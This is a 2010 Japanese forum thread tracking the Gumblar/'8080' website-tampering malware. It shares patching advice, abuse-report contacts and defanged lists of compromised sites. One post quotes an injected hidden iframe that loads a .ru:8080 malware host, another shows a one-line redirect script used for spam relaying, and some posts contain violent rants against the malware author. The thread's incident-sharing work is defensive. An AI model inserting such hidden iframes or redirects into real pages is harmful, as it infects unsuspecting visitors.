【Gumblar/GENO】Web改竄ウイルス総合10【8080】

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
http://pc11.2ch.net/test/read.cgi/sec/1274675964/
2名無しさん@お腹いっぱい。:2010/07/21(水) 15:14:27
Gumblar(.x)、8080系ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す


※サイトを運営されている方は、さらに次のことも実施していただきたい。

(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
3名無しさん@お腹いっぱい。:2010/07/21(水) 15:15:11
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
 ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
4名無しさん@お腹いっぱい。:2010/07/21(水) 15:16:11
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります

●InternetExplorer ツール→インターネットオプション→セキュリティ→
  レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
  ※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
  デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
  ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
   もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
5名無しさん@お腹いっぱい。:2010/07/21(水) 15:16:54
ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。

【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
6名無しさん@お腹いっぱい。:2010/07/21(水) 15:17:59
改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。

■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/


サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。

以下、代表的なサーバー管理会社

デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support
7名無しさん@お腹いっぱい。:2010/07/21(水) 15:18:40
改竄を受けたら

ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先

IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
8名無しさん@お腹いっぱい。:2010/07/21(水) 16:25:49
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView

設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
9名無しさん@お腹いっぱい。:2010/07/21(水) 16:28:02
>>1-8
テンプレ乙
10名無しさん@お腹いっぱい。:2010/07/21(水) 17:10:35
【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
http://pc11.2ch.net/test/read.cgi/sec/1278430098/

なんでこっちじゃいかんの?
11名無しさん@お腹いっぱい。:2010/07/21(水) 17:31:04
998 名前:名無しさん@お腹いっぱい。:2010/07/21(水) 13:27:53
取扱注意
www●kakiyasuhonten●co●jp

999 名前:名無しさん@お腹いっぱい。:2010/07/21(水) 13:52:18
store●nextbusinesssystem●com
www●kidsdrink●jp
12名無しさん@お腹いっぱい。:2010/07/21(水) 17:39:43
ちょw柿安本店てw
13名無しさん@お腹いっぱい。:2010/07/22(木) 15:49:34
どっか stuxnet 取り扱ってるスレ無いかしら?
スレチ承知スマソだけど8080使いそうで怖すぎる
14名無しさん@お腹いっぱい。:2010/07/22(木) 15:59:26
いちおexploit-dbに転がってるけど(コンセプトコードか実物は知らん)、
今のところは標的型だから実物は発電所勤務とかでもなきゃ手に入らないんじゃね。
15名無しさん@お腹いっぱい。:2010/07/23(金) 01:19:56
22日21時に、8080の検体を収集しにいったけんど、特に変化
なし。まぁ感染するウイルスは定期的に差しかえられるので、
毎日が0デイ状態のようなもの・・・
ttp://www.virustotal.com/analisis/42c9f334b7de4a63ed92be606a650d59771fb354fa49f4399d098c24529c925d-1279803865
16名無しさん@お腹いっぱい。:2010/07/23(金) 17:47:55
>>15
検体欲しぃの
17名無しさん@お腹いっぱい。:2010/07/23(金) 20:11:16
18名無しさん@お腹いっぱい。:2010/07/23(金) 20:15:02
別だろ。Gumblarの目的はbotnetの構築と
botnetの顧客への販売(インチキセキュソフトの販売等)だろうから。
まだZeuSとかのがありえる。
19名無しさん@お腹いっぱい。:2010/07/23(金) 20:21:06
こえー
20名無しさん@お腹いっぱい。:2010/07/23(金) 20:36:25
今のガンブラーってScript系だから、殆ど検出されるんじゃね?
21名無しさん@お腹いっぱい。:2010/07/24(土) 17:35:48
//www.crimsontech.jp/jp/ddp/index.html
22名無しさん@お腹いっぱい。:2010/07/24(土) 17:41:13
無言でURLだけ貼るなよ
23名無しさん@お腹いっぱい。:2010/07/24(土) 17:46:54
//store.nextbusinesssystem.com/
あぅあぅ〜
24名無しさん@お腹いっぱい。:2010/07/24(土) 17:48:19
感染サイトならドットを●に変換しろよ
25夷塚 ◆y0JEaK6O/gDf :2010/07/24(土) 19:24:00
>>21
pantscow●ru:8080/CD-ROM●js
凸っておきました
26名無しさん@お腹いっぱい。:2010/07/25(日) 05:18:35
マスターペニス
27名無しさん@お腹いっぱい。:2010/07/25(日) 13:18:20
>>17
SQLインジェクション系攻撃にやられたんじゃねーの?

うちのサイトは、アプリ更新あるごとに外部のセキュリティー企業で診断+Webファイアウォール導入だな
28名無しさん@お腹いっぱい。:2010/07/25(日) 14:37:47
カスペルスキーのGumblar-x駆除ツール
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
を使用したところ

Spliced functions という値が32(ほかの値は0)という結果が表示されました

何度かツールを実行したのですが Spliced functions の値がずっと 1 のままです。


これは既に感染していると考えてよろしいのでしょうか?
29名無しさん@お腹いっぱい。:2010/07/25(日) 18:19:09
カスペスレで聞けよ
30名無しさん@お腹いっぱい。:2010/07/27(火) 19:01:28
Gumblarってなんでruが多いの?
31名無しさん@お腹いっぱい。:2010/07/28(水) 11:11:08
32名無しさん@お腹いっぱい。:2010/07/28(水) 13:59:32
本家gumblarはあちこちなんじゃね。
そもそもzlkon.lv→gumblar.cn→martuz.netだったわけだし。
これらは日本を除外している( >>31 )。
ru多めなのは8080。
33名無しさん@お腹いっぱい。:2010/07/28(水) 14:00:34
martuzもcnだった。
34名無しさん@お腹いっぱい。:2010/07/28(水) 14:34:40
>>31
まだ読んでないけど、実際はUSが多いのかthx

>>32
8080型に多いのは知ってるんだけどさ
TLDがruに偏ってたのはなんでだろうなーと思って
特に理由はないのかね
35名無しさん@お腹いっぱい。:2010/07/28(水) 14:48:07
そりゃRBNあたりがやってんでしょ
36夷塚 ◆y0JEaK6O/gDf :2010/07/29(木) 20:37:57
>>21
www●crimsontech●jp/jp/home●html
> 弊社ホームページに関するお詫びとお知らせ

対応してくれた模様、感染の公表とIPAへの報告に感謝
もうちょっと早かったら言うことなかったなあ


で、本スレどっち…
37名無しさん@お腹いっぱい。:2010/07/30(金) 14:23:39
民間のセキュリティ企業がFBIのサイバー犯罪捜査に協力、スロベニアでハッカーを逮捕
http://pandajapanblogs.blogspot.com/2010/07/fbi.html
38名無しさん@お腹いっぱい。:2010/07/30(金) 22:12:08
ほんと>>37のニュースみたいにGumblarの作者が逮捕されるか射殺されればいいのに…
39名無しさん@お腹いっぱい。:2010/07/30(金) 23:15:08
射殺はかわいそうだろ。
感染PC全部駆除の刑。
40名無しさん@お腹いっぱい。:2010/07/30(金) 23:44:11
565 名前:大人も子供も名無しさんも再び[sage] 投稿日:2010/07/30(金) 21:05:39 ID:pHxHBUIQ
ポケモンの公式ページ、
新しいポケットモンスターのこと知ってますかのページの
左上任天堂ロゴのリンク先おかしいぞ
社員見てるならさっさと直せ

497 名前:名無しさん必死だな[sage] 投稿日:2010/07/30(金) 21:18:47 0
クリックしたらパス求められるな


任天堂HPにもGumblarか?
41名無しさん@お腹いっぱい。:2010/07/30(金) 23:52:11
ウェブ担当のミスじゃねーの?
42名無しさん@お腹いっぱい。:2010/07/31(土) 00:07:55
Gumblar作者を頃したいと思う人は多いだろうな
本当に死ねばいいのに
43名無しさん@お腹いっぱい。:2010/07/31(土) 01:34:47
ゼロデイならともかく既知の脆弱性を放置してやられる方にも問題あると思うぞ
鍵開けてたら泥棒に入られましたみたいな
44名無しさん@お腹いっぱい。:2010/07/31(土) 09:36:27
泥棒より放火魔に例える方があっているな。
放火魔が出ているのに燃えやすいものを置きっぱなしにして
火事になり、近隣まで延焼で大迷惑。
45名無しさん@お腹いっぱい。:2010/08/02(月) 00:10:24
>>43>>44
PC初心者でもすぐにできる対処法だけで完璧に防げるならその物言いも罷り通るんだけどな
現実は日々ゼロデイ
46名無しさん@お腹いっぱい。:2010/08/03(火) 00:41:46
>>43-45
日本には「○○入れてるから大丈夫」という
セキュリティソフト依存症患者(精神疾患)が多いからなw

壁や屋根に穴が空いてたり、鍵や窓が壊れていても
「セコム入ってるから大丈夫(キリッ」
(´・ω・`)
47名無しさん@お腹いっぱい。:2010/08/03(火) 04:17:41
止まらぬサイト改ざん:訪問の心あたりはありませんか〜新規告知サイト14件
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2307
48名無しさん@お腹いっぱい。:2010/08/04(水) 10:08:04
Google Chrome(Win版)や、IE8+保護モード(Vista/7)で防げるのに
いまだにXP使ってたりFirefox使ってるアホが多いからこんなに感染者が増えるんだよ

Firefoxが高セキュリティーとかガセネタ流してるアホは全員死刑にすべき
49名無しさん@お腹いっぱい。:2010/08/04(水) 11:00:57
Win7で、Firefox+Noscript/RequestPolicyと、Google Chrome
どっちが安全?
50名無しさん@お腹いっぱい。:2010/08/04(水) 11:16:07
どんな道具を使おうと使う人間がアホなら穴だらけ。
このソフトなら安全と過信している時点でその類だよ。

そもそも100%感染防止なんてできないのに
感染防止策だけで満足しているにわかは多い。
51名無しさん@お腹いっぱい。:2010/08/04(水) 11:33:53
Gumblarのみを考えた場合、感染の確率が低い方はどっち?

RequestPolicyがあれば他ドメインへの通信はしないから外部接続系には安全
アクセス自体しないんだから当たり前
Chromeはアクセスしちゃうけどなんで大丈夫なの?
52名無しさん@お腹いっぱい。:2010/08/04(水) 11:39:44
しつこいぞカス
53名無しさん@お腹いっぱい。:2010/08/04(水) 11:46:59
ググったらなんとなくわかったからいいや
ttp://blog.fourteenforty.jp/blog/2010/04/windows-xpgoogl.html
スレ汚し失礼
54名無しさん@お腹いっぱい。:2010/08/04(水) 16:33:53
二度と来るなよ
55名無しさん@お腹いっぱい。:2010/08/05(木) 15:09:30
取扱注意
www●1on1●jp
www●untiens●jp
ログにはru8080へ接続した形跡があるけど、aguseだと検出しないという…
ruドメインのjsファイルが呼び出された後に8080サイトへ行ってるみたいだが…
56名無しさん@お腹いっぱい。:2010/08/06(金) 14:31:13
てす
57コテハン ◆8080adndqg :2010/08/06(金) 14:33:25
【陥落サイトのURL悪用厳禁】
■現行型
チャイナ・テーブル 八菜香
398133●com/

当選者発表|柿安創業138周年感謝祭
www●kakiyasuhonten●co●jp/m138th
禿に捕捉(キャッシュ)されてまつw

■トラップ(はぢめて見た)
【楽々茶 LALACHA】:中国茶・茶器・雑貨専門店
www●lalacha●com/

<iframe src=”hxxp://parkperson●ru:8080/index●php?pid=13” width=”0” height=”0” style=”display:none”></iframe>

■旧型(絶賛放置中)
hnfko●web●fc2●com/yama/20080428_shishigatake/index●html
adajo●namidaame●com/

58名無しさん@お腹いっぱい。:2010/08/06(金) 15:03:10
柿安 める凸完了
他は知らんw
5958:2010/08/06(金) 19:33:39
柿安から返信&該当ページの消滅を確認。
--
この度は当社サイトについてご連絡頂き誠にありがとうございました。
〜〜中略〜〜
ご連絡を受けまして確認の上速やかに削除いたしました。
重ねてお礼申し上げます。
--
との事。
60名無しさん@お腹いっぱい。:2010/08/08(日) 15:57:11
Webサイトの大規模改ざんでオンラインゲームサイトが標的に
http://itpro.nikkeibp.co.jp/article/COLUMN/20100801/350884/
61名無しさん@お腹いっぱい。:2010/08/09(月) 16:43:43
dansen.co.jp
これは新しい…
62名無しさん@お腹いっぱい。:2010/08/09(月) 17:12:55
63名無しさん@お腹いっぱい。:2010/08/09(月) 20:58:36
jsのこれ?
/*SOS*/

飛び先はNortonセーフウェブで黒判定。
64名無しさん@お腹いっぱい。:2010/08/09(月) 21:14:48
って、飛び先が真っ黒なのを確認すた。>>63
65名無しさん@お腹いっぱい。:2010/08/09(月) 21:44:46
>>64
× 飛び先が真っ黒なのを確認
○ 飛び先のサイトが真っ黒なのを確認

youhelpnow●ru:8080
66名無しさん@お腹いっぱい。:2010/08/09(月) 21:50:44
ノーガードでこのスレに貼られたサイトよく見てるのにまだ一度もやられたことない
やられるやつって相当アホだろ
67名無しさん@お腹いっぱい。:2010/08/09(月) 22:49:14
>>63
全cssの末尾に何か付いてる
68名無しさん@お腹いっぱい。:2010/08/09(月) 22:56:25
>>67
どもです。
cssにも付くようになったのね。。。
69名無しさん@お腹いっぱい。:2010/08/10(火) 01:08:37
>>67-68
末尾「.txt」にして送付、ひげおじさんからお返事。

> 〜.css.txt - Trojan-Downloader.JS.Agent.fnh
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
70名無しさん@お腹いっぱい。:2010/08/10(火) 01:23:31
71名無しさん@お腹いっぱい。:2010/08/10(火) 01:25:32
[国際110番・20スパム紹介・今月のスパム日記]
http://www.fuzita.org/spams/spamdiary.html

<html><head><script>location = 'http://xxxxxx/';</script></head></html>
↑こんな一行htmlをUPしてスパムの中継にも使われてる
72名無しさん@お腹いっぱい。:2010/08/10(火) 02:09:24
>>70
\(^o^)/オワタ
73名無しさん@お腹いっぱい。:2010/08/10(火) 02:12:08
>>70
\(^o^)/直リンクw
74名無しさん@お腹いっぱい。:2010/08/10(火) 02:16:41
>>62
Exploit.HTML.HCP.a
75名無しさん@お腹いっぱい。:2010/08/10(火) 10:04:49
>>62
オンラインゲームのパス抜きのもの
ilion.blog47.fc2.com/blog-entry-201.html
www.virustotal.com/jp/analisis/cdff7e34478a48929083674034e97fb773dcf40ccef8e70b6f6a2e56fa34c870-1281401616

>>66
ノーガードとかアホとか関係なくって、ソフトウェアの
脆弱性をふさいでるかどうか
76名無しさん@お腹いっぱい。:2010/08/10(火) 16:18:37
>>61-62 消えたw
77名無しさん@お腹いっぱい。:2010/08/10(火) 19:27:11
注入箇所削除の後告知なしで再開。
この短時間でアプリの穴を修正できるわけがない、と思ったら停止しただけでござる。

2010.08.10 2011年度向け商品開発中のため現在、
商品ページがご覧になれなくなっています。
ご迷惑をおかけしますが何卒ご了承ください。
78名無しさん@お腹いっぱい。:2010/08/10(火) 20:07:37
大量の「禿.js」を装填中w
www●bmisland●net/input/mailmag/detail●asp?MAGID=31&MAGCLS=274&SDFLG=1

79名無しさん@お腹いっぱい。:2010/08/11(水) 05:11:56
80名無しさん@お腹いっぱい。:2010/08/11(水) 09:14:04
>>78と同じやつ
www●dousoukainet●jp/plan●asp
81名無しさん@お腹いっぱい。:2010/08/11(水) 21:18:37
今のところ「禿.js」を防ぐセキュリティソフトは皆無か
82名無しさん@お腹いっぱい。:2010/08/11(水) 22:04:54
また凝りもせず新型を作りやがったのか
本気で作者を頃してやりたいわ
つーか本気で氏ねよ銃殺されろ
作者の国に核落とされて滅んじまえ
83名無しさん@お腹いっぱい。:2010/08/11(水) 23:22:44
>>81
セキュリティソフトは関係ないよ。
現時点での話に限れば、それはIEブラウザ、かつWindows Updateを
しとらん場合に攻撃が成立しうる。

逆に8080やgumblar.xはブラウザの種類は関係ない。
アクセスしてきたブラウザに応じた攻撃コードが生成されるように
なっとる。
84名無しさん@お腹いっぱい。:2010/08/12(木) 01:05:00
>>81
*/yahoo.js*
全部蹴ればええやんw
85名無しさん@お腹いっぱい。:2010/08/12(木) 01:06:35
>>82
ニュースで窃盗事件が流れるたびにそこまで考えてたら疲れないか?
とっくに地球滅びてるよな
86名無しさん@お腹いっぱい。:2010/08/13(金) 14:23:50
311 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 02:29:59 ID:1TXtyzUW0
けいおんのモデルの子も同窓会ネットで顔バレしてるぞ
http://www.dousoukainet.jp/plan.asp

だから言わんこっちゃない┐(VДV)┌

336 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:37:24 ID:LsxSDH1C0
>>311
これ前にも見たけど
けいおんのモデルになったJKって美人ではあるけどアニメには劣るよな
所詮3次元('A`)

387 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:55:26 ID:z25JrXmm0
>>311
そのページのどこにも写真ないんだけど

411 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 03:09:49 ID:PPZzZ1Px0
(VДV)部アッハッハッハはヒャ日波や八はアッハハハyはyヒャヒャヒャhyはyはy早はh!

俺様が貼ったのは最新のウィルスだよ
(<●>Д<●>)踏んだ奴ざまぁあああああああああああああああああああああああああっ!
駆除方法はメール欄参照な:(>w<):

416 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 03:17:09 ID:PPZzZ1Px0
さてウィルス(>>311)も踏ませたことだし
もう寝るお

(VдV)踏んだ奴は徹夜してリカバリするかLANケーブル外しとくことだな
どちらにせよお前らがウィルス対策の作業している間、俺様はグッスリzZZだお♪
87名無しさん@お腹いっぱい。:2010/08/13(金) 14:53:05
iPhoneが乗っ取られるリスク、「Gumblar攻撃」の併用で具現化する恐れ
http://www.itmedia.co.jp/enterprise/articles/1008/12/news061.html

とうとうWinだけの問題じゃなくなってきたな
88名無しさん@お腹いっぱい。:2010/08/13(金) 15:06:17
>>86
だからそういう奴がいるから
結局●とか入れても意味ねーんだよ
なので次からURL貼るときは●抜きを許可する
89名無しさん@お腹いっぱい。:2010/08/13(金) 17:36:26
>>86
これはどういうウイルスですか?
90名無しさん@お腹いっぱい。:2010/08/13(金) 17:41:06
>>86
これ踏んじゃったんだけどJavaScript切っていれば大丈夫?
91名無しさん@お腹いっぱい。:2010/08/13(金) 18:16:38
>>86
これって禿.jsって奴?
Firefox+NoScriptなら踏んでもOK?
92名無しさん@お腹いっぱい。:2010/08/13(金) 19:08:27
>>91
おk
93名無しさん@お腹いっぱい。:2010/08/13(金) 19:30:30
>>89
ネトゲのトロイ。
94名無しさん@お腹いっぱい。:2010/08/13(金) 19:42:34
同窓会ネット aguse、gredどちらも無反応なのだが
95名無しさん@お腹いっぱい。:2010/08/13(金) 20:08:07
gumblarじゃないからじゃね
96名無しさん@お腹いっぱい。:2010/08/13(金) 20:10:01
禿もガンブラーもjs切っておけば問題なし
97名無しさん@お腹いっぱい。:2010/08/13(金) 20:12:14
>>95
ネトゲやってないからよく分からないけど
右上のにID、PASSを入力したらネトゲアカウント取られるってやつ?
98名無しさん@お腹いっぱい。:2010/08/13(金) 20:29:08
というかさ、こんなのに感染する奴って何も設定変えてないIEでインターネットしてる初心者だけ
そんな奴らは絶対IEなんか使っちゃ駄目だろ
別にFirefox厨じゃないけどFirefox+NoScriptでブラウジングしておきゃ感染しないんだから
初心者にはこの組み合わせを薦めるべき
入れるだけでおkなんだから
99名無しさん@お腹いっぱい。:2010/08/13(金) 20:37:55
それは言える
>>2よりも>>4こっちが最優先
100名無しさん@お腹いっぱい。:2010/08/13(金) 20:38:41
>>98
2行で済むことをそんな必死に書く低脳が言っても説得力0なんだぜ
101名無しさん@お腹いっぱい。:2010/08/13(金) 20:41:30
黙れ低脳
102名無しさん@お腹いっぱい。:2010/08/13(金) 20:42:28
そもそもWindowsUpdateしていれば感染しない。
103名無しさん@お腹いっぱい。:2010/08/13(金) 22:25:13
>>98
初心者にそんなもんすすめても
動かなくなったって言ってIEにもどるだけだろ
本人のできる範囲で対策させないと何の意味もない
104名無しさん@お腹いっぱい。:2010/08/13(金) 22:33:48
ttp://www.m-sennin.com/
SBMSPAM業者でもgumblar8080判定。
105名無しさん@お腹いっぱい。:2010/08/13(金) 22:53:17
http://www●dousoukainet●jp/plan●asp
ここでは異常なしって流れになってるがどっちが本当なの?

勇気がなくて踏めないURL鑑定スレin初質 Part42
http://toki.2ch.net/test/read.cgi/qa/1277970504/
106名無しさん@お腹いっぱい。:2010/08/13(金) 23:05:55
あのクソ顔文字まだ捕まってねーのかよ
通報してんのになんでだ!
107名無しさん@お腹いっぱい。:2010/08/13(金) 23:30:14
>>105
ここは鑑定スレじゃない
108名無しさん@お腹いっぱい。:2010/08/13(金) 23:53:16
>>105
そのURLに関しては大丈夫 とだけ書いておく
109名無しさん@お腹いっぱい。:2010/08/14(土) 00:04:11
>>106
器物損壊で被害届け出せば?(笑
110名無しさん@お腹いっぱい。:2010/08/14(土) 01:58:19
>>106
法律に無知な奴は恥ずかしいから発言するなよ
夏厨死ね!
111コテハン ◆8080adndqg :2010/08/14(土) 03:23:55
>>104
古いやつ・・
/AC_RunActiveContent.js
>Last-Modified: Fri, 29 Jan 2010 20:48:14 GMT
112名無しさん@お腹いっぱい。:2010/08/14(土) 09:58:00
あははは調子ぶっこいてるな顔文字
いつまで続くかな
113名無しさん@お腹いっぱい。:2010/08/15(日) 02:40:56
馬鹿だな
何年も前からやってて逮捕されてない有名人なんだから
法律が改正でもされん限り続くだろ
114名無しさん@お腹いっぱい。:2010/08/15(日) 08:17:06
社会情勢の変化ってのはあるよ。
イカタコウィルスもそうだが、今までは手をこまねいていたものを
無理矢理何かにあてはめてタイーホというのはよくある話。
特に、その時点の署長や長官が興味を持つと、強制捜査したり
するようになる。
115名無しさん@お腹いっぱい。:2010/08/15(日) 22:23:27
>>114
お前法律わかってないだろw
無知乙
116名無しさん@お腹いっぱい。:2010/08/15(日) 22:29:36
このスレはミーハーが多いから
ちょっとしたイカタコとか例に出してるとこから見て
なにか面白いニュースがあるとすぐそれを引用したがるんだろうな
リアルで馬鹿な分ネットで知的ぶりたいだけだと思う
117名無しさん@お腹いっぱい。:2010/08/15(日) 22:32:17
おっとあげちまったな
まあ過疎すれだからいいけど
あと「ちょっとした」の部分は抜いて読めよ
118名無しさん@お腹いっぱい。:2010/08/15(日) 22:46:38
さっきURLがあまり晒されなくなったというか以前より少なくなったけど
減ってきてるのか?それともスレ分裂のせいか。
119コテハン ◆8080adndqg :2010/08/15(日) 23:16:58
【陥落サイトのURL悪用厳禁】
■関東学生アメリカンフットボール連盟公式ホームページ
www●kcfa●jp/
※7月21日以前から陥落してるっぽい

■京都大学漫画研究部
kyoto-u-mk●hp●infoseek●co●jp/
※更新履歴の中に紛れ込んでる・・

【改竄】絶賛ループ中w【再改竄】
darkside●higashino●jp/ms●cgi?ShowDiary_file=/lasertank/1281712375&blogid=&t=sketch
※コメント欄
>報告ありがとうございます。
>前回より被害範囲は狭まっています。
>追加対策して、根比べです。
>必ず追い出します。

クリーンインストールしろよwww
120名無しさん@お腹いっぱい。:2010/08/15(日) 23:50:12
>>119
それちょっとアホの子だなあ
根絶させるためにJPCERT/CC経由でやってもらったほうがいいかも
121名無しさん@お腹いっぱい。:2010/08/16(月) 00:04:52
>※更新履歴の中に紛れ込んでる・・
ソースでは末尾なんだろうね。
それより後ろはiswebが勝手に入れる広告なので。
122名無しさん@お腹いっぱい。:2010/08/16(月) 15:07:02
www●ark-web●jp/sandbox/wiki/204●html
叩くとホコリが出てきそうなWeb屋だなw
123名無しさん@お腹いっぱい。:2010/08/16(月) 16:24:52
>>119-120
■7月12日(たぶん改竄記念日)
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1278935970
コメントにセキュリティソフト云々・・・

■7月13日
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1279023797
>『何か謎ですね』
>急に報告が来てるので、試しにウイルスバスター2010試用版を入れてみました。
>特におかしなものは検出されていません。
